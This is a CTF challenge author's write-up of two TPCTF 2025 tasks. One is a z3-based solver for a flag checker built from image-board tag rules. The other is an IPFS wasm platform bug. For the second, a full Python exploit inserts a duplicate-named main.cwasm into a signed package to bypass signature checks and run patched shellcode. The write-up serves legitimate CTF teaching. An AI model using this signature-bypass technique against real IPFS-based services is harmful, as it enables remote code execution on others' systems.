[Writeup] TPCTF 2025 Official Writeup (Selected Challenges)


I set two challenges for this TPCTF: Misc - ipvm and Rev - superbooru. In my opinion they are of medium difficulty, with superbooru being the harder one. The overall idea was to bring in elements that rarely show up in regular CTFs and hopefully give everyone some new experiences and inspiration. Feel free to reach out if you have any thoughts.

Post-contest note: superbooru ended with a single solve (by 0ops); ipvm went unsolved.

superbooru

This challenge was inspired by booru image boards. "Booru" is the umbrella term for image-hosting services that let you upload images and tag them. The challenge implements a simple and very ugly booru (I am never using tailwind again), with one twist: tag rules can be configured statically, so you do not have to apply piles of tags by hand. A rule has the form condition -> consequence; the grammar in EBNF is as follows:

TAG = /\w+/
ATOM = TAG | GROUP | NEG
GROUP = "(" CONDITION ")"
NEG = "-" ATOM

OR_TERM = ATOM ("/" ATOM)+
AND_TERM = OR_TERM ("," OR_TERM)+

CONDITION = ATOM | OR_TERM | AND_TERM
CONSEQUENCE = (NEG? TAG) ("," (NEG? TAG))*

Here are some valid rules (a small sketch of the apply semantics follows the list):

  • dog, male -> male_with_dog, -pet_only: when the tags contain both dog and male, the tag male_with_dog is automatically added and the tag pet_only is removed
  • (dog / cat), -male -> pet_only, animal_only: when the tags contain dog or cat and do not contain male, then…
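
To make the semantics concrete, here is a minimal sketch (my own illustration, not the challenge's actual implementation) of how a single parsed rule updates a tag set; a rule is modeled as a predicate over the current tags plus a list of (tag, keep) updates:

def apply_rule(tags: set[str], condition, consequence) -> set[str]:
    # condition: predicate over the tag set; consequence: list of (tag, keep),
    # where keep=False means the tag is removed instead of added
    if not condition(tags):
        return tags
    new_tags = set(tags)
    for tag, keep in consequence:
        (new_tags.add if keep else new_tags.discard)(tag)
    return new_tags


# dog, male -> male_with_dog, -pet_only
rule = (lambda t: {"dog", "male"} <= t, [("male_with_dog", True), ("pet_only", False)])
print(apply_rule({"dog", "male", "pet_only"}, *rule))
# {'dog', 'male', 'male_with_dog'}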

Looks pretty good! Now let's open the implications.txt shipped with the challenge.

Doo-doo-da, doo-doo-da…

Look closely: the lowercase Latin i and the Ukrainian і are not the same character (inspired by a certain LA CTF challenge 🤮). In other words, the challenge uses these rules to implement a flag checker: the input is the flag_bin_xx tags at the start, and the correct output is the tag flag_correct. Now we have to reverse this pile of rules. (Who, me?)
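
A quick way to spot (and search for) this kind of homoglyph trick is to inspect the code points directly, for example:

import unicodedata

for ch in "iі":  # Latin i followed by Ukrainian і
    print(hex(ord(ch)), unicodedata.name(ch))
# 0x69 LATIN SMALL LETTER I
# 0x456 CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I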

If consequences never contained -, the world would be a wonderful place, praise the lord! We could simply use z3, define each tag as the OR of the conditions of the rules that imply it, and solve for the constraint flag_correct. The annoying part is precisely that -. How can a tag be added and then wiped out again?
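
In that negation-free world the encoding would be trivial, roughly like this (toy rules of my own, not the challenge's):

from z3 import Bool, Or, Solver, sat

# Toy rules: flag_bin_00 -> a ; flag_bin_01 -> a ; a -> flag_correct
flag_bin_00, flag_bin_01 = Bool("flag_bin_00"), Bool("flag_bin_01")
a = Or(flag_bin_00, flag_bin_01)  # each tag is the OR of the conditions implying it
flag_correct = a

s = Solver()
s.add(flag_correct)  # require the checker to accept
assert s.check() == sat
print(s.model())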

Looking at the code, the implementation runs in rounds: each round checks which rules apply, and all tag updates are committed together at the end of the round. Running the flag check several times reveals something interesting: the round at which it terminates is almost fixed (around round 2476), which suggests that the rules encode one fixed piece of logic. On top of that, the kind challenge author left a note in the code:

# It's guaranteed that the same implication applied
# multiple times will not change the result

In other words, each rule effectively fires at most once, and even if it fired multiple times the result would not change. Indeed, if you record in which round each rule fires, you will find that it is essentially fixed. This leads to a rough conjecture: the rules are split into many layers, and within one layer a rule is either never applied or applied in the same round as all the other rules of that layer.
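
For reference, the round-based semantics described above can be re-implemented in a few lines; this is my sketch based only on the observed behavior (in particular, how the real checker resolves an add and a remove of the same tag within one round is an assumption here):

def run(tags: set[str], rules) -> tuple[set[str], int]:
    # A rule is (pos, neg, cons): it fires when all tags in `pos` are present and
    # none in `neg` are; `cons` is a list of (tag, keep) updates. All updates of a
    # round are committed together, and we stop once a round changes nothing.
    rounds = 0
    while True:
        adds, removes = set(), set()
        for pos, neg, cons in rules:
            if pos <= tags and not (neg & tags):
                for tag, keep in cons:
                    (adds if keep else removes).add(tag)
        new_tags = (tags | adds) - removes
        if new_tags == tags:
            return tags, rounds
        tags = new_tags
        rounds += 1


rules = [
    (frozenset({"go"}), frozenset(), [("go", False), ("step1", True)]),
    (frozenset({"step1", "a"}), frozenset(), [("b", True)]),
]
print(run({"go", "a"}, rules))  # ({'a', 'step1', 'b'}, 2), set order may vary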

But how do the rules manage to layer themselves like this? As the hint released in the second half of the contest also pointed out, starting from the initial check_flag tag there is a chain of rules of the form check_flag -> -check_flag, new_flag1, then new_flag1 -> -new_flag1, new_flag2, and so on. By adding new_flag{n} as an extra condition to every rule of the n-th layer, the rules become layered.

With that settled, we first write a script that simplifies the expressions in the original challenge and strips out the unused tags that are only there for obfuscation. The code is as follows:

sol.py
from tqdm import tqdm

SPECIAL_CHARS = "(),/-"

name_map = {}


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        if self.tag in name_map:
            return name_map[self.tag]
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

imps = imps[6:]

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

used = set()
queue = ["flag_correct"]
head = 0
while head < len(queue):
    cur = queue[head]
    head += 1
    for i in who_implies.get(cur, []):
        imp = imps[i]
        for tag in imp.condition.tags():
            if tag not in used:
                used.add(tag)
                queue.append(tag)

all_tags = set()
for imp in imps:
    all_tags.update(imp.condition.tags())
    all_tags.update(Group("and", imp.consequence).tags())

unused = all_tags - used - {"hooray", "flag_correct"}
for imp in imps:
    imp.consequence = [
        tag
        for tag in imp.consequence
        if not (isinstance(tag, Tag) and tag.tag in unused)
        and not (isinstance(tag, Neg) and tag.query.tag in unused)
    ]

with open("mapping.txt", "w") as f:
    for name in used:
        if not name.startswith("flag") and name != "check_flag":
            name_map[name] = f"t{len(name_map)}"
            print(f"{name_map[name]} = {name}", file=f)

with open("implications_new.txt", "w") as f:
    for imp in imps:
        print(imp, file=f)

Next, on top of this equivalent and much more readable implications_new.txt, we extract the check_flag chain (call it the pc chain). Given the layered structure, we can annotate each consequence tag with the layer it belongs to. For example,

check_flag -> -check_flag, new_flag1
new_flag1, a -> c
new_flag1, -a -> -c

new_flag1 -> -new_flag1, new_flag2
new_flag2, b -> a
new_flag2, -b -> -a

new_flag2 -> -new_flag2, new_flag3
new_flag3, c -> b
new_flag3, -c -> -b

These rules are equivalent to three lines of code executed in order: c = a, a = b, b = c. After annotating the tags with their layer:

a1 = a0, b1 = b0, c1 = a0
a2 = b1, b2 = b1, c2 = c1
a3 = a2, b3 = c2, c3 = c2

After this transformation we can build a model. To keep the final model from blowing up, we only keep the tags that actually change in each layer (for example, a1, b1, b2, c2, a3 and c3 above are dropped), and then everything can be solved directly with z3. On top of that, z3 can also verify that the solution is unique.
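
For the toy example above, the resulting z3 encoding (keeping only the variables that change in each layer) would look roughly like this; the final constraint is a stand-in for whatever the real checker requires:

from z3 import Bools, Solver, sat

a0, b0, c0 = Bools("a0 b0 c0")  # initial values: the unknowns we solve for
c1, a2, b3 = Bools("c1 a2 b3")  # only the tags that change in layers 1..3

s = Solver()
s.add(c1 == a0)  # layer 1: c = a
s.add(a2 == b0)  # layer 2: a = b   (b unchanged so far, i.e. b1 = b0)
s.add(b3 == c1)  # layer 3: b = c   (c last written in layer 1)
s.add(b3)        # stand-in for the real flag_correct constraint
# c0 is never read: c is overwritten in layer 1 before any use
assert s.check() == sat
print(s.model())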

sol2.py
from tqdm import tqdm
from z3 import Solver, Bool, BoolVal, And, Or, sat, is_true, unsat

SPECIAL_CHARS = "(),/-"

cur_pc = None


def format_z3(pc, tag):
    return Bool(f"{pc}_{tag}")


class Token:
    def __init__(self, value):
        self.value = value

    def __eq__(self, other):
        return isinstance(other, Token) and self.value == other.value

    def __repr__(self):
        return f"Token({self.value!r})"


class Lexer:
    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def __iter__(self):
        return self

    def char(self):
        if self.pos >= len(self.text):
            raise StopIteration
        return self.text[self.pos]

    def __next__(self):
        while self.char().isspace():
            self.pos += 1

        ch = self.char()
        if ch in SPECIAL_CHARS:
            self.pos += 1
            return Token(ch)

        start = self.pos
        while not (ch.isspace() or ch in SPECIAL_CHARS):
            self.pos += 1
            if self.pos >= len(self.text):
                break
            ch = self.char()

        return self.text[start : self.pos]


class Query:
    def __and__(self, other):
        return Group("and", [self, other])

    def __or__(self, other):
        return Group("or", [self, other])

    def __invert__(self):
        if isinstance(self, Neg):
            return self.query
        return Neg(self)

    def unwrap(self, type):
        return [self]

    def simplify(self):
        pass


class Tag(Query):
    def __init__(self, tag: str):
        self.tag = tag

    def __str__(self):
        return self.tag

    def __eq__(self, other):
        return isinstance(other, Tag) and self.tag == other.tag

    def __hash__(self):
        return hash(self.tag)

    def simplify(self):
        return self

    def tags(self):
        yield self.tag

    def to_z3(self):
        assert cur_pc is not None
        if self.tag in pc_order:
            return BoolVal(True)
        if self.tag.startswith("flag_bin_") or self.tag == "check_flag":
            return Bool(self.tag)

        for i in reversed(tag_pcs.get(self.tag, [])):
            if i < cur_pc:
                return format_z3(i, self.tag)

        return BoolVal(False)


class Neg(Query):
    def __init__(self, query: Query):
        self.query = query

    def __str__(self):
        return f"-{self.query}"

    def __eq__(self, other):
        return isinstance(other, Neg) and self.query == other.query

    def __hash__(self):
        return hash(self.query)

    def simplify(self):
        if isinstance(self.query, Neg):
            return self.query.query.simplify()
        return ~self.query.simplify()

    def tags(self):
        return self.query.tags()

    def to_z3(self):
        return ~self.query.to_z3()


class Group(Query):
    def __init__(self, type: str, queries: list[Query]):
        self.type = type
        self.queries = queries

    def __str__(self):
        assert self.queries
        sep = ", " if self.type == "and" else " / "
        return f"({sep.join(map(str, self.queries))})"

    def unwrap(self, type):
        if self.type == type:
            result = []
            for query in self.queries:
                result.extend(query.unwrap(type))
            return result
        return [self]

    def __eq__(self, other):
        return (
            isinstance(other, Group)
            and self.type == other.type
            and self.queries == other.queries
        )

    def __hash__(self):
        return hash((self.type, tuple(self.queries)))

    def simplify(self):
        negs = set()
        queries = []
        for query in self.queries:
            for item in query.simplify().unwrap(self.type):
                if isinstance(item, Group) and not item.queries:
                    assert item.type != self.type
                    return item
                if item in negs:
                    return Group("and" if self.type == "or" else "or", [])
                negs.add(~item)

                queries.append(item)

        if len(queries) == 1:
            return queries[0]

        return Group(self.type, queries)

    def tags(self):
        for query in self.queries:
            yield from query.tags()

    def to_z3(self):
        queries = [query.to_z3() for query in self.queries]
        return And(queries) if self.type == "and" else Or(queries)


def take_atom(lexer):
    token = next(lexer)
    if token == Token("("):
        return take_expr(lexer)
    elif token == Token("-"):
        return ~take_atom(lexer)
    elif isinstance(token, str):
        return Tag(token)
    else:
        raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
    stack = [take_atom(lexer)]
    while True:
        try:
            token = next(lexer)
        except StopIteration:
            break

        if token == Token("/"):
            value = take_atom(lexer)
            stack[-1] = stack[-1] | value
        elif token == Token(","):
            stack.append(take_atom(lexer))
        elif token == Token(")"):
            break
        else:
            raise ValueError(f"Unexpected {token}")

    return Group("and", stack)


def parse_query(query: str):
    lexer = Lexer(query)
    return take_expr(lexer)


class Implication:
    def __init__(self, condition, consequence: list[str]):
        self.condition = condition
        self.consequence = consequence

    def __str__(self):
        cond = str(self.condition)
        if cond.startswith("("):
            cond = cond[1:-1]
        cons = ", ".join(map(str, self.consequence))
        return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
    lhs, rhs = implication.split("->")
    return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications_new.txt") as f:
    imps = []
    for i, line in enumerate(f):
        line = line.strip()
        if not line:
            continue

        imps.append(parse_implication(line))

for imp in tqdm(imps):
    imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
    for tag in imp.consequence:
        if isinstance(tag, Tag):
            who_implies.setdefault(tag.tag, []).append(i)
        elif isinstance(tag, Neg):
            who_implies_neg.setdefault(tag.query.tag, []).append(i)

pcs = ["check_flag"]
while True:
    pc = pcs[-1]
    if pc not in who_implies_neg:
        break
    assert len(who_implies_neg[pc]) == 1
    imp = imps[who_implies_neg[pc][0]]
    assert len(imp.consequence) == 2
    other = (
        imp.consequence[0]
        if isinstance(imp.consequence[1], Neg)
        else imp.consequence[1]
    )
    assert isinstance(other, Tag)
    pcs.append(other.tag)

print(len(pcs))

pc_order = {pc: i for i, pc in enumerate(pcs)}

important_imps = []
tag_pcs = {}
for imp in tqdm(imps):
    if isinstance(imp.condition, Tag) and imp.condition.tag in pcs:
        continue
    assert len(imp.consequence) == 1
    tag = imp.consequence[0]
    if isinstance(tag, Neg):
        continue

    tag = tag.tag
    if tag == "hooray":
        continue

    pc = None
    for t in imp.condition.tags():
        if t in pc_order:
            assert pc is None
            pc = t

    assert pc
    pc = pc_order[pc]
    imp.pc = pc
    important_imps.append(imp)
    tag_pcs.setdefault(tag, []).append(pc)

for pcs in tag_pcs.values():
    pcs.sort()

defs = {}

solver = Solver()
for imp in tqdm(important_imps):
    tag = imp.consequence[0].tag
    pc = imp.pc

    cur_pc = pc

    key = (pc, tag)
    val = defs.setdefault(key, BoolVal(False))
    defs[key] = val | imp.condition.to_z3()

for (pc, tag), val in defs.items():
    solver.add(format_z3(pc, tag) == val)

pcs = tag_pcs["flag_correct"]
assert len(pcs) == 1
solver.add(format_z3(pcs[0], "flag_correct"))

assert solver.check() == sat
model = solver.model()

ors = []

bits = []
flags = set()
for i in range(256):
    fl = f"flag_bin_{i:02x}"
    bits.append("01"[int(is_true(model[Bool(fl)]))])
    ors.append(Bool(fl) != is_true(model[Bool(fl)]))
    if is_true(model[Bool(fl)]):
        flags.add(fl)

solver.add(Or(*ors))
assert solver.check() == unsat

print(flags)

chs = []
for i in range(32):
    bs = bits[i * 8 : (i + 1) * 8]
    chs.append(chr(int("".join(reversed(bs)), 2)))

print("".join(chs))

The code looks long, but most of it is the duplicated expression-parsing part. A full run of the exploit takes about a minute, which is still within an acceptable range, I suppose.

Guess whose exploit took longer to write than the challenge itself.

ipvm

This challenge is built on IPFS, a decentralized file storage protocol. In essence, IPFS splits a piece of data into many blocks, each uniquely identified by its hash; the data as a whole is also identified by a hash (the hash over the concatenation of its child blocks' hashes, see Merkle tree), called a CID. The blocks are then distributed across a P2P network. Ideally, given only the CID of a piece of data or a file, you can recursively download all of its blocks from the network. Sounds cool! In practice, though, P2P is nowhere near as usable as it sounds, and IPFS has several design flaws of its own; see How IPFS is broken. That said, IPFS still seems to have quite a few users these days, so to each their own.
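
As a rough illustration of the "hash over the child hashes" idea (a toy Merkle construction of my own; the real CID computation additionally involves multihash and DAG-PB encoding):

import hashlib

def merkle_id(data: bytes, chunk_size: int = 4) -> bytes:
    # Split the data into fixed-size chunks, hash each chunk, then identify the
    # whole blob by the hash over its children's hashes.
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    child_hashes = [hashlib.sha256(c).digest() for c in chunks]
    return hashlib.sha256(b"".join(child_hashes)).digest()

print(merkle_id(b"hello ipfs").hex())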

Back to the challenge. It builds a mysterious wasm execution platform on top of IPFS. By uploading files via CIDs, you can:

  • build: upload a folder containing wat / wasm files (yes, IPFS supports folders); the server compiles it with optimizations, signs the result, and returns the CID of the compiled package
  • run: submit a package CID; the server verifies the signature and then runs it

Yes, it really is that simple. Can there even be a vulnerability here?

As we know, running wasm usually means AOT-compiling it first and then executing native code. Here, build and run split that process in two, which opens the door to RCE: what build produces is literally native code, so if we can control the input of run, we can do whatever we want. Unfortunately, the signature gets in the way: anything that was not produced by a legitimate build cannot pass signature verification. And the wasmtime runtime is famous for its security, so pulling off some 0day RCE starting from wasm itself is not realistic. What now?

If you look closely enough, you will notice an inconsistency in how the challenge reads files inside a folder. The first path is ipfs_read, a function that directly calls ipfs cat <path> to print a file's contents; here path can be either a CID itself (which of course requires the CID to point to a file rather than a folder) or a path under a CID (for example CID/config.json). The second path creates a temporary directory and uses ipfs get <CID> to download every file under the CID into it.
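
In terms of the underlying commands, the two code paths boil down to something like the following sketch (helper names are mine; the real service wraps these differently):

import os
import subprocess as sp
import tempfile

def read_via_cat(cid: str, name: str) -> bytes:
    # Path 1 (ipfs_read): stream a single file straight out of the DAG
    return sp.check_output(["ipfs", "cat", f"{cid}/{name}"])

def read_via_get(cid: str, name: str) -> bytes:
    # Path 2: download the whole folder to a fresh directory, then read from disk
    out = os.path.join(tempfile.mkdtemp(), "pkg")
    sp.check_call(["ipfs", "get", cid, "-o", out])
    with open(os.path.join(out, name), "rb") as f:
        return f.read()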

Using these two different mechanisms may look unintentional, but it is entirely deliberate. A little digging shows that IPFS stores folder blocks in the DAG-PB format, whose protobuf definition is as follows:

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}

At this point an evil idea naturally comes to mind: what happens if a PBNode contains multiple PBLinks with the same name (that is, a folder containing several files with the same name)? A quick test shows that ipfs cat returns the contents of the first such file, while ipfs get writes all of them in order, so the file on disk ends up with the contents of the last one. With this inconsistency, we can maliciously append an extra main.cwasm to the package produced by build: signature verification still passes because it uses ipfs cat, but when the package is downloaded with ipfs get and executed, our malicious main.cwasm runs. That gives us RCE.

As for crafting main.cwasm, I simply patched a legitimately compiled main.cwasm in IDA and stuffed a chunk of shellcode into the function body.

Note: compile the protobuf with protoc dag.proto --python_out .

exp.cwasm

dag.proto
syntax = "proto3";

message PBLink {
  // binary CID (with no multibase prefix) of the target object
  optional bytes Hash = 1;

  // UTF-8 string name
  optional string Name = 2;

  // cumulative size of target object
  optional uint64 Tsize = 3;
}

message PBNode {
  // refs to other objects
  repeated PBLink Links = 2;

  // opaque user data
  optional bytes Data = 1;
}
build/config.json
{
  "name": "test",
  "entrypoint": "add"
}
build/main.wat
(module
  (func $add (export "add") (param $a i32) (param $b i32) (result i32)
    (i32.add (local.get $a) (local.get $b))
  )
)
exp.py
from dag_pb2 import *
from base58 import b58decode
import subprocess as sp
import requests as rq


ip, port = '127.0.0.1 8000'.split()
base = f"http://{ip}:{port}"
ipfs = ["ipfs", "--api", f"/ip4/{ip}/tcp/{port}"]


def add(path):
    output = sp.check_output(ipfs + ["add", "-r", path]).decode().strip()
    line = output.splitlines()[-1]
    return line.split()[1]


built = rq.post(f"{base}/build", json={"cid": add("build")}).json()
output = sp.check_output(ipfs + ["block", "get", built["cid"]])

node = PBNode()
node.ParseFromString(output)

exp = add("exp.cwasm")
node.Links.insert(2, PBLink(Hash=b58decode(exp), Name="main.cwasm", Tsize=13483))

p = sp.Popen(ipfs + ["block", "put", "--format=v0"], stdin=sp.PIPE, stdout=sp.PIPE)
p.stdin.write(node.SerializeToString())
p.stdin.close()
modified = p.stdout.read().decode().strip()

output = rq.post(f"{base}/run", json={"cid": modified, "args": "1"}).json()
print(output)

Post-challenge note: the vulnerability itself is really not complicated; the wat2wasm step included in the challenge is purely a distraction (the author was afraid the bug would be too obvious at a glance), but the distraction apparently worked a bit too well (ouch).

Author: Mivik
Published: 2025-03-09, updated 2025-03-10
Link: https://mivik.moe/2025/solution/tpctf-2025/